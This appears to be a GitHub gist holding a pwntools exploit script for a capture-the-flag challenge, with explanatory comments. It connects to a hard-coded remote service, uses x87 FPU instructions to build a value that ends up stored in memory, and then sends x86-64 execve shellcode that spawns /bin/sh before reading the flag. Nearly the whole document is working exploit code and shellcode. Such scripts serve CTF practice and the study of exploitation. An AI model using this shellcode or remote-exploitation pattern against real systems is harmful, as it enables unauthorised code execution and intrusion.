@dfyz
Last active June 18, 2023 04:13
from pwn import *
# CTF exploit script (pwntools). The remote service, judging by the protocol
# used below, accepts hex-encoded x86-64 instruction bytes after a ': ' prompt
# and executes them; the script first builds a small integer on the x87 FPU
# stack one instruction at a time, then stores it and sends a second stage.
# NOTE(review): from a defender's view the root issue is executing
# client-supplied bytes at all; W^X / non-executable data pages would also
# be expected to stop the final stage, which presumably runs the stored bytes.
#
# Indentation in the pasted source was lost; it is restored here from the
# statement structure (with / def / for / if), no other token is changed.

# padding; push 0; ret
# The five bytes `00 00 6a 00 c3` are read as one little-endian integer so
# the value can be reconstructed arithmetically on the FPU stack.
TARGET = int.from_bytes(b'\x00\x00\x6a\x00\xc3', byteorder='little')
# Bytes the service prints when it is ready for the next command.
PROMPT = b': '
# Second-stage payload, assembled for x86-64 by pwntools further down: it
# zeroes eax/rdx/rsi, pushes an 8-byte constant onto the stack, points rdi at
# it (push rsp; pop rdi) and issues syscall number 0x3b.
SHELLCODE = r'''
xor eax, eax
xor rdx, rdx
xor rsi, rsi
movabs rbx, 0x68732f2f6e69622f
push rbx
push rsp
pop rdi
mov al, 0x3b
syscall
'''
# TCP connection to the challenge service; closed when the block exits.
with remote('3.38.149.80', 20001) as tube:
    def run_x87(cmd):
        """Send one instruction to the service: two NOPs (0x90) followed by
        *cmd*, hex-encoded, after waiting for PROMPT."""
        full_cmd = flat(b'\x90\x90', cmd)
        tube.sendlineafter(PROMPT, full_cmd.hex().encode())
    # Three x87 primitives, each sent as its raw opcode bytes.
    load_one = lambda: run_x87(b'\xd9\xe8') # fld1
    double = lambda: run_x87(b'\xd8\xc0') # fadd st0, st0
    add_one = lambda: run_x87(b'\xd8\xc1') # fadd st0, st1
    # After two fld1: st0 = 1 (the running value), st1 = 1 (a constant used
    # by add_one). st0 already encodes TARGET's most significant set bit.
    load_one()
    load_one()
    # Classic double-and-add over the binary expansion of TARGET, MSB first.
    # The top bit (index bit_length() - 1) is the initial st0 = 1, so the
    # loop starts one bit below it.
    for bit in range(TARGET.bit_length() - 2, -1, -1):
        double()
        if TARGET & (1 << bit):
            add_one()
    # Final command: the assembled SHELLCODE followed by `fistp qword ptr [rax]`,
    # which pops st0 (now TARGET) and stores it as an integer at [rax].
    # Where rax points at that moment is determined by the remote service,
    # not by anything visible here — TODO confirm against the challenge binary.
    tube.sendlineafter(PROMPT, flat(
        asm(SHELLCODE, arch='amd64'),
        b'\xdf\x38' # fistp qword ptr [rax]
    ).hex().encode())
    # Send a command to whatever is now reading stdin and print one reply line.
    tube.sendline(b'cat flag')
    print(tube.recvline())